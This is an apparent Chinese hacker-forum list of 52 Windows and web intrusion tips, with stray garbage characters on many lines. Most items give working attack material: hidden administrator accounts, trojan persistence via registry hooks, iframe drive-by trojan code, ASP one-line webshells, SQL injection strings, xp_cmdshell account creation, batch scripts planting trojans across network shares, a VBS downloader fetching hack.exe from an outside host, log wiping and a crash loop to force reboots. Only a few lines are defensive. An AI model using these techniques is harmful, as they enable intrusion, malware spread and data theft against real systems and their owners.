1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,
: k6 \: P- i1 c1 _cacls C:\windows\system32 /G hqw20:R9 o5 ^0 b W3 ^. ^
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入( O" V: d4 \2 \
恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F$ G$ v0 P4 b9 y, a( A' V$ D
& O! }# P+ G/ a( P+ W3 s7 c2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。7 a h! L2 P3 Y* }
6 E; P1 `6 W( |6 L3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。3 m7 \: M. E. u# q Q
5 l* \( @5 O7 P; w$ u; H4 o2 h
4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
: ~- a4 |& ]5 m1 F6 x Z
! x2 o+ W+ l5 u" Q( P7 @5、利用INF文件来修改注册表
6 O! ?5 J4 M) }; d5 {0 ][Version]1 S* ]& x/ ]1 M
Signature="$CHICAGO$"
: N+ M3 G" ~% \1 Q8 @1 }9 ]* R[Defaultinstall]5 c+ |6 \+ s8 u4 j
addREG=Ating
5 O3 I" _7 Q) _0 D[Ating]# W) c1 @* h% M
HKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"6 O3 C d& f1 W9 y& n4 S" I0 p, \
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:
* M$ h2 o7 Z* v7 [. W3 lrundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径4 Z+ R, z% V. o
其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
( h& A C: P* c( d: uHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU6 w. M8 i- m" B( w
HKEY_CURRENT_CONFIG 简写为 HKCC
- s; U; x0 {5 t$ O5 c) v! V/ x0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值" m3 ^8 ?8 r7 H5 B5 c2 v+ ]+ S
"1"这里代表是写入或删除注册表键值中的具体数据1 Q# ^0 g7 @& m3 L! d& i! p
: Q& T# K# G( k' H) A6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
) t' _2 [0 X. M6 H+ `多了一步就是在防火墙里添加个端口,然后导出其键值' e) K) J8 U. l+ ]6 @. p0 y
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
# Q6 R) j2 j2 I* B& q$ L @/ p+ z' G3 l: v% ]
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽. v2 H6 U8 i& A5 b. |0 [' [4 D" ^
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。3 y0 |: m2 x0 g$ H( g
3 C! D3 N! _6 [5 I+ @
8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。+ l. @5 p8 a1 R& U
6 I/ ^* D8 ~5 ~9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,
, N/ j2 y3 t% p I, b J可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。
1 _- f) _% Z/ P/ P0 }; G5 l2 @
7 ?( ~: k% d0 e2 E$ g6 H$ o2 Q# W10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
, r+ h0 D1 G: L; Q, N: d0 o, S; ?/ M4 ]
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
% I' K8 U, Q1 M' s用法:xsniff –pass –hide –log pass.txt- a+ ] _/ c* h; x# V+ `6 [6 A
9 ?: E7 j" t, P12、google搜索的艺术# O! \1 k2 D ^& @# P8 b/ k
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”
& ^7 s1 u. r: D* V6 G或“字符串的语法错误”可以找到很多sql注入漏洞。- F9 p. Z: y) z
+ d5 w- m4 ?- C13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。
6 k! ?' F" x3 b* Y( h3 `& y" D c8 h# w9 N2 A+ W% X
14、cmd中输入 nc –vv –l –p 1987; Y" [* i; h+ V" h( G& ^
做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃
; X) j. l' g& b* A% _9 o, Z' F
6 j+ K- k5 U5 C# I) q" ~ ?4 Q8 \15、制作T++木马,先写个ating.hta文件,内容为" ?/ {1 n y* d C2 h/ R7 @! E& Q4 J; i
<script language="VBScript">
6 v3 e4 K; R; h- p' cset wshshell=createobject ("wscript.shell" )
% z: C/ j- j9 @& k# K8 Xa=wshshell.run("你马的名称",1)
/ a- O* O# P- r3 Qwindow.close
% P* K/ g# v0 m& B+ ~' W: Y</script>6 R& f, L A, ?2 M# i/ E: x
再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。
! s2 `* {% a+ |( S2 o
& ~* V" c& Q% O1 G6 i$ p# V! x16、搜索栏里输入3 m+ d0 t9 b6 p; ?, f: ^ v
关键字%'and 1=1 and '%'='
& G; ?+ _$ d: z& u关键字%'and 1=2 and '%'='9 o2 ^+ U) v: ~' |% X
比较不同处 可以作为注入的特征字符
" V O$ ]2 a+ T a) j/ Y9 A2 Q8 b- o
17、挂马代码<html>9 S* E8 h" p% A
<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>! o) @+ X/ c6 O" @* w# Z
</html>; R" a4 p6 m: d9 `; w/ Q G$ g
f$ d. [: j m7 D8 w5 v" x
18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,0 A% s6 R$ R) u) u9 D5 I4 f% q
net localgroup administrators还是可以看出Guest是管理员来。
. Q5 V. E9 O3 R0 u% q% |0 J- S- x, W' s$ I- A3 T
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等3 H0 u8 }( ~! u* u6 i6 W
用法: 安装: instsrv.exe 服务名称 路径
. ?9 X8 } M! \, z9 H M+ ~2 \卸载: instsrv.exe 服务名称 REMOVE
& \, r2 P9 @$ G4 ?& L- T! W" D) M3 T& D5 S) y% ~& {2 b/ n% Z( W/ {# R
9 B8 Z- T6 i- x* }' C
21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉
3 H C" ~2 N/ m. X& v不能注入时要第一时间想到%5c暴库。: x; i6 z( E, ?) Q7 c
3 r4 R: ]- g- z22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~
$ j: i }4 I, N$ T5 D$ O/ k9 m, B9 A, C$ O
23、缺少xp_cmdshell时! l9 k6 V) H* |; F8 ]8 b& ]
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
! n* J \, C, t( P& J9 T* @假如恢复不成功,可以尝试直接加用户(针对开3389的)
! E. Q' s5 @# { Fdeclare @o int7 q7 i& Y& o6 Q; ~
exec sp_oacreate 'wscript.shell',@o out
3 x5 V, W* Z* }, J; M* kexec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员
% `& ?. |/ j5 E r& U' |) ]+ z0 f; G( b( v
24.批量种植木马.bat
2 R4 b6 T* O, d3 K3 h, l6 c' [% tfor /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中+ }! T8 B1 d0 w4 }" H
for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
6 X q/ A$ H5 d4 v+ q3 z扫描地址.txt里每个主机名一行 用\\开头
( i7 r/ l. T* C7 Y! Z! h
2 f' ^: b! r+ ?( B; V% @25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。4 t* q: r, k/ Z5 U( x
+ Y! P/ N9 f- v h
26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
+ G5 \( u! B) d3 C0 v' `将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
8 Q; D R) K, \% p8 C& C0 m/ {* O.cer 等后缀的文件夹下都可以运行任何后缀的asp木马9 I) F( X6 |% W4 W/ J- w
. ^6 v! P. j" q+ m27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
3 X X7 V" R) A; A6 U1 G然后用#clear logg和#clear line vty *删除日志! @! k1 m2 t+ L2 P) d3 @( e
: Z* v4 B/ N- n5 o# b
28、电脑坏了省去重新安装系统的方法
$ y7 v2 r$ a \% f# i4 r Q纯dos下执行,- n* Z3 B( I( k3 R7 q t& T
xp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config1 j, D. e. @8 o. w4 b3 l5 L
2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
6 l, m8 K! n' P0 ] \% I. a% |; m- B" C( W& e# O: |$ V6 m& n
29、解决TCP/IP筛选 在注册表里有三处,分别是:
' K0 U5 v9 X& `$ F; o3 CHKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip5 v8 C& Y0 k _
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
4 s0 m, F' l& Y/ L o# }4 GHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip m/ O; k& v8 }# ^# m- q; A' C
分别用! p( E U7 `; X
regedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip0 j4 {# N* |; B- m
regedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
* y5 e+ g, m+ Q0 E+ Rregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip- q! C/ ?" C$ @( |: v- Q) Q% }
命令来导出注册表项9 k9 F6 R/ F9 w! ~6 Z
然后把三个文件里的EnableSecurityFilters"=dword:00000001,
4 I& g+ A y+ e) q改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用+ C. x9 l9 Y3 p
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。3 u+ d) V6 T+ C) x' n
2 Y3 R5 T4 w/ s8 Q30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U
0 F/ D# [# x0 W3 U4 A' _SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3) @4 u5 E$ s! g0 k3 u0 i3 l% v t
6 E1 z, x; \/ |. w9 Y% X& V3 a31、全手工打造开3389工具
& U( U- ? g. n- [2 H h/ `打开记事本,编辑内容如下:
+ {1 Q; Q" l" m" o( p0 _+ t5 P! Gecho [Components] > c:\sql5 }1 r3 W) Q4 ?+ w
echo TSEnable = on >> c:\sql
+ e- @4 m* P# N2 Jsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
\) Y3 g5 ~# C9 S9 t编辑好后存为BAT文件,上传至肉鸡,执行
$ i; g6 A9 b7 c: i7 H
4 `7 f0 Z E5 `32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马( a, w7 E+ c- G7 O! H
; F' j4 t4 K/ n. o' W
33、让服务器重启& i: m2 Q% u! P* a, |, m$ W
写个bat死循环:
- {- {) r4 P9 T( Q/ w@echo off
* j. V; P; Q. y; `% U:loop15 \ J+ k( T/ z3 O2 F
cls
$ G9 a( e" X) j& Dstart cmd.exe4 L( ~, t$ Q+ t
goto loop1
, k1 E$ V+ T2 ~保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启
0 Z; S+ U" l; Z/ e; j' w
, S$ J1 ^6 z1 {/ \8 |34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,
; r: Z' S+ V. e% p& E# Y@echo off) F" |3 x/ t \1 K8 `
date /t >c:/3389.txt
! ^2 L7 R/ o8 X) S4 c' R9 Itime /t >>c:/3389.txt
9 a6 R; ~- ]6 `* H# E9 K3 k6 D: S" Oattrib +s +h c:/3389.bat
- z) o% I# k9 }6 ]/ X8 Z; Lattrib +s +h c:/3389.txt
+ Z( n3 Y2 L2 ?! Qnetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
$ }% }; j+ R7 M- U3 S- D1 v并保存为3389.bat
6 ?1 D' }7 Y$ V2 a打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
, K$ U8 k7 ?0 k# b' h9 C1 ?. @ r/ G7 c' _& v C
35、有时候提不了权限的话,试试这个命令,在命令行里输入:! c' H( H$ L. Z3 a
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)( F5 g/ ~' h" m5 D
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
- l+ A5 Q. `# e" r r, M, f# y
! k0 }- z/ l8 W$ S0 W' l R36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
1 v) ]/ s; N& U" h. e5 jecho open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
: X4 X7 @8 Y, [1 g# a: lecho 你的FTP账号 >>c:\1.bat //输入账号+ R) U) ^6 U. r: o Q3 X
echo 你的FTP密码 >>c:\1.bat //输入密码
1 I" w3 z. ?, Hecho bin >>c:\1.bat //登入
0 m8 m( E w- k1 cecho get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么( Y) D: g2 k% t9 s1 E! X
echo bye >>c:\1.bat //退出$ g, M6 w1 Y5 m2 x* A
然后执行ftp -s:c:\1.bat即可$ {& A3 ?& N# t* H
+ p# X! }2 C( V- \, s v! o3 @! a37、修改注册表开3389两法7 m. V" R0 P: W6 ]$ I) P2 @
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
4 @+ F+ y2 j7 u2 }( Mecho Windows Registry Editor Version 5.00 >>3389.reg. T- X+ G' K& h. @0 k
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
% u! N+ {4 S9 O5 l$ w6 fecho "Enabled"="0" >>3389.reg: t4 u# l4 y3 A) } s! S! ~
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows& f7 D# B3 g. `" o5 O: c) Q
NT\CurrentVersion\Winlogon] >>3389.reg' j& P+ j! P) | @9 I3 f' r6 B
echo "ShutdownWithoutLogon"="0" >>3389.reg+ [# S! G& W; l" i$ O9 J+ H
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
% Z' m+ g9 E2 i2 p1 n. A: d>>3389.reg
$ Y2 ?5 o E- f9 F D F/ Necho "EnableAdminTSRemote"=dword:00000001 >>3389.reg
' z" T6 \5 z( {. @. }echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
! h) {6 s8 W* J>>3389.reg. g( n! i. ?. Z& ~5 t
echo "TSEnabled"=dword:00000001 >>3389.reg
& D- X \, z7 K. a9 Qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
3 v) A; A8 A1 K# o! ]7 \/ |' Jecho "Start"=dword:00000002 >>3389.reg
/ j# g5 q, L! u2 Q6 secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] J& r; j1 ?. ^, b. m! o5 s
>>3389.reg
! k3 W3 P& c# h* N1 Vecho "Start"=dword:00000002 >>3389.reg0 e/ @5 H1 n% p- Y1 f
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
% ^! S& O6 Z3 techo "Hotkey"="1" >>3389.reg
/ \9 N+ J' t- Q+ gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
4 X; K2 c+ n. k O7 E) i( |Server\Wds\rdpwd\Tds\tcp] >>3389.reg
# Y6 `' l! H6 J! r0 I* z9 necho "PortNumber"=dword:00000D3D >>3389.reg
1 Y7 k' ?! P7 U+ {& |' \) U- q2 iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
9 }' K! c3 c/ v% F/ EServer\WinStations\RDP-Tcp] >>3389.reg2 R- v: ~; T9 U. Q+ r# X# t) i- s
echo "PortNumber"=dword:00000D3D >>3389.reg- q. B! m: Y: m5 u, Z4 D
把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
$ M) k/ l/ {' L* j4 G, p# _' ](如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
$ V0 A T" X9 I因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效* l7 h+ [! d/ U" B0 _
(2)winxp和win2003终端开启
" t9 e5 q) I% t4 C: R: N% i# P) a用以下ECHO代码写一个REG文件:
- ~. E1 f" X& X8 u$ pecho Windows Registry Editor Version 5.00>>3389.reg2 r, o5 ]' w* n( j! f5 h/ }
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
" E" t. s8 Y1 v' I/ F7 ^7 e9 RServer]>>3389.reg7 S) s: ?2 K7 v' D" g; c
echo "fDenyTSConnections"=dword:00000000>>3389.reg
9 e1 I7 H1 x' h# `' Pecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
* X) n( z1 @( |Server\Wds\rdpwd\Tds\tcp]>>3389.reg
0 A9 q0 U% T6 i1 L' becho "PortNumber"=dword:00000d3d>>3389.reg
' P" ^8 l& W; r0 Zecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal/ x! O, b# A$ n' a
Server\WinStations\RDP-Tcp]>>3389.reg
; E m& a+ L7 ^5 B0 Xecho "PortNumber"=dword:00000d3d>>3389.reg: r! q, x+ k7 M4 a
然后regedit /s 3389.reg del 3389.reg
4 ^- ]8 ]6 T' @* PXP下不论开终端还是改终端端口都不需重启
& @" L0 y5 ~% U+ }
6 Z& x1 [' Q3 R: j38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃% ]7 A9 j0 T" x k) ?
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa' B/ I& T; F: s5 y- M6 n* p, m7 \- x
e( l/ m8 K2 R4 e" C* `39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
% z+ G: Q# g0 e0 ^: d x1 }(1)数据库文件名应复杂并要有特殊字符
/ y% I, G/ {- Z(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
7 \3 @! a p+ \将conn.asp文档中的
" B) B4 a2 F" W' RDBPath = Server.MapPath("数据库.mdb")
8 a f) M+ U4 f6 i, Q' ?9 g. ^conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
' c/ H; B$ z7 b% H5 [8 p
8 V8 i. s( h) S& f修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置6 r: Q& E5 c3 ]2 k$ b) R6 s( V: H$ k
(3)不放在WEB目录里! G) M: R8 p; _1 {
& Z' d* |. Y: `2 j
40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
: s7 x, |; J5 w& Z# h$ i可以写两个bat文件
. o6 W% d: N% c1 G/ W) u@echo off& a y1 N- o: B: Z
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe x5 U, r# T0 z; e4 W
@del c:\winnt\system32\query.exe
+ ]5 l. l+ V7 y@del %SYSTEMROOT%\system32\dllcache\query.exe
0 L7 z$ T1 G6 d- @5 A- B@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
n% w1 z& ]4 H% s( T4 ?0 i6 @) g8 s3 B2 q6 L7 C. N- L5 @! r
@echo off: T* O# B5 t# N+ V1 ]1 k+ s
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe* g% ?+ K7 e/ n; S( u
@del c:\winnt\system32\tsadmin.exe% l8 \: O% {4 {' i* g
@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex
% k9 R6 H. c i `4 y4 l0 w' p* z0 J3 F* [& @0 i; r* ]
41、映射对方盘符) E" ^; b m' e$ W
telnet到他的机器上,# p2 D4 d6 @* f5 O& ]
net share 查看有没有默认共享 如果没有,那么就接着运行# \% c: `1 p/ ? k0 F# S& [. g1 B- o+ x
net share c$=c:# s, J) Y- r2 r( X+ X
net share现在有c$
0 x% L8 i& g- z G$ Q( W在自己的机器上运行
% @, ?. J2 C' V" ?/ R V' _6 `# Rnet use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K
1 u& L3 G) n9 h% w8 N2 I0 D @/ h8 a( h+ `/ s7 c
42、一些很有用的老知识: u: a( G3 \0 Y
type c:\boot.ini ( 查看系统版本 )$ q y M) M" J- a
net start (查看已经启动的服务)
% X6 ], t! b/ C% W/ xquery user ( 查看当前终端连接 )
; I' x2 c0 ~0 f0 \% s- c+ U- s1 lnet user ( 查看当前用户 )
4 G/ ]2 ?% b b: |% q; {. f- Hnet user 用户 密码/add ( 建立账号 )
/ F/ e7 C3 n1 d8 F% V% w3 ]( ^7 @net localgroup administrators 用户 /add (提升某用户为管理员); l- d7 s4 X; z
ipconfig -all ( 查看IP什么的 )
- B- l0 v! ]4 n1 Fnetstat -an ( 查看当前网络状态 )
: g9 F5 x$ Z! @findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)/ G) _" N8 w2 ^2 B
克隆时Administrator对应1F4
- \7 W- G7 G) ]/ hguest对应1F5+ S8 {# F9 v! i1 L
tsinternetuser对应3E8! b1 x! }, _2 Y' j5 ?8 {
' f. F, ~$ p: ]) G. Y43、如果对方没开3389,但是装了Remote Administrator Service1 W3 z8 q' l4 W2 x9 g
用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接
- q, ~: [' U9 p7 Q1 C解释:用serv-u漏洞导入自己配制好的radmin的注册表信息6 f3 I" `4 F2 I
先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"
3 g3 x9 X+ V: q; f2 j) U/ ^4 X/ `0 ]0 t. `4 {/ ?
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定)! ]& \4 G K* |- I1 M- Y+ Z
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)
/ ]2 J7 {# b. t K0 _0 D* R, F0 H2 Q% r6 `; [" b4 |
45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)
, ?3 I& b$ j7 F! decho Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open. ?5 s$ U$ P( o& e& B+ X) r! T
^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =
$ Q, N0 ]9 y8 YCreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =* n4 u, s: j4 l) R) P( r( ^
1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs
( ]4 J) T2 `% p* E(这是完整的一句话,其中没有换行符)
V* l d3 v2 [% s6 A然后下载: V" F( p! R- q' ^+ |6 ~8 A' m
cscript down.vbs http://www.hack520.org/hack.exe hack.exe
0 H8 M$ b6 E( E% ^3 }# a5 L9 z B: M6 M) F0 P0 z" @
46、一句话木马成功依赖于两个条件:9 T( [; g9 b' M. {2 d" S" V8 d* ?5 }
1、服务端没有禁止adodb.Stream或FSO组件
4 a6 o' R& A f2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。
6 y' c0 {$ S7 Z7 y/ H0 ~1 A" P" |3 G w9 P3 ], a8 Q
47、利用DB_OWNER权限进行手工备份一句话木马的代码:
* Y, E9 v7 `! w9 P;alter database utsz set RECOVERY FULL--
1 L7 |& C9 |' M" d% O& g;create table cmd (a image)--
% n @" E/ ?6 G- S. a;backup log utsz to disk = 'D:\cmd' with init--
4 w9 S4 X. Z6 R4 z, P, R) [% V) c;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--; z$ [) S5 F% a( W P' l- n
;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--: @. s1 d* e7 c9 v' r2 l
注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。' C) K" p& P" V! g/ O7 k! b
9 S$ `% Z, {6 C0 j" T4 e
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
& N# g; H$ R, \( @& }. z& p# s5 X( J9 W+ j
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options r. p% N8 c H
所有会话用 'all'。
v4 @& B o6 p1 s-s sessionid 列出会话的信息。
; ~( ?" a% O; G& {, o-k sessionid 终止会话。% o0 c5 a4 [7 w$ o9 H: F0 F
-m sessionid 发送消息到会话。
' R/ L* Z! k0 C7 A
! r" [7 H p1 T; O" X7 H, I+ Oconfig 配置 telnet 服务器参数。
1 u, _7 c" I1 ~% s: U
* r4 |( H8 @% _6 J# c1 E) jcommon_options 为:' a% g9 M8 ?% `+ h0 c
-u user 指定要使用其凭据的用户; p! F$ h" B. t
-p password 用户密码) `! m3 ?1 P0 D9 A% X+ h
/ }5 A' q" C: L7 P" f m) h6 xconfig_options 为:: p$ b" C" T( d0 H, m, T) T3 d
dom = domain 设定用户的默认域
$ j9 I9 \( W. x1 ~2 cctrlakeymap = yes|no 设定 ALT 键的映射
+ T2 ]) @' G* s: l' itimeout = hh:mm:ss 设定空闲会话超时值
, x* b. |8 d/ t I8 n% gtimeoutactive = yes|no 启用空闲会话。! ~3 [0 O0 y( X* D
maxfail = attempts 设定断开前失败的登录企图数。
6 b# l1 B9 }7 [6 U6 c! Omaxconn = connections 设定最大连接数。/ L; i' l6 ]8 F* r( K+ e
port = number 设定 telnet 端口。2 u0 W; ?& c Y* K
sec = [+/-]NTLM [+/-]passwd9 ^: \' o9 W! ?9 z2 R
设定身份验证机构
3 p- n* d0 r7 e& O/ sfname = file 指定审计文件名。
- Q& j; S. y: y: T" b6 Efsize = size 指定审计文件的最大尺寸(MB)。
6 _8 x/ t- o7 Umode = console|stream 指定操作模式。
9 E. P8 P" H5 L+ w" l+ b' z; |auditlocation = eventlog|file|both
: Z, W* o% ^' J& n9 ?% ~3 h( W0 x+ K指定记录地点
9 q$ w0 c+ o/ A" [$ Raudit = [+/-]user [+/-]fail [+/-]admin7 `. K, l7 X0 \
# X) p3 m3 ` A1 p+ ]. C
49、例如:在IE上访问:7 a4 }5 D; c* \8 r! z. H; b
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/
; F1 X& Q, ?5 a7 xhack.txt里面的代码是:( Q' v% g3 O3 g/ b4 l3 Z
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">
$ Z% _( g$ ^4 V0 t3 G f2 E把这个hack.txt发到你空间就可以了!
9 o9 M% E6 g, N( G4 Y7 [这个可以利用来做网马哦!! M' n/ o* [% X* k
! n) y2 K/ M6 n8 l1 K# O50、autorun的病毒可以通过手动限制!/ K x, g" B6 ?8 P% ^! A
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!
. f4 S; P$ E- D# w# b9 w# g( v0 a, ]/ L2,打开盘符用右键打开!切忌双击盘符~. G2 v7 p5 e! J5 Y0 }
3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!" p0 @: t0 v" E/ ?
4 `1 [" g6 H3 [+ J6 |6 r* ^0 k
51、log备份时的一句话木马:6 Y4 ?7 Z* O$ u! b7 B
a).<%%25Execute(request("go"))%%25>
$ ]& y6 V* z) q' H8 B: sb).<%Execute(request("go"))%>
3 W! T4 Z1 n2 d6 N8 H3 v4 Fc).%><%execute request("go")%><%
, O% m: C3 x* x4 {( Ld).<script language=VBScript runat=server>execute request("sb")</Script>
; _4 H. h0 k, f( p$ `e).<%25Execute(request("l"))%25>; ?& s2 `9 s, v# h
f).<%if request("cmd")<>"" then execute request("pass")%>+ i; Q$ |% }: i5 A5 X5 T0 F* u
1 R- } K, z6 G3 Y6 f52、at "12:17" /interactive cmd
$ y9 q# l5 o: W( I1 V执行后可以用AT命令查看新加的任务1 D; A$ t8 C8 Z
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。% h$ Q) ?9 {$ c% N) y
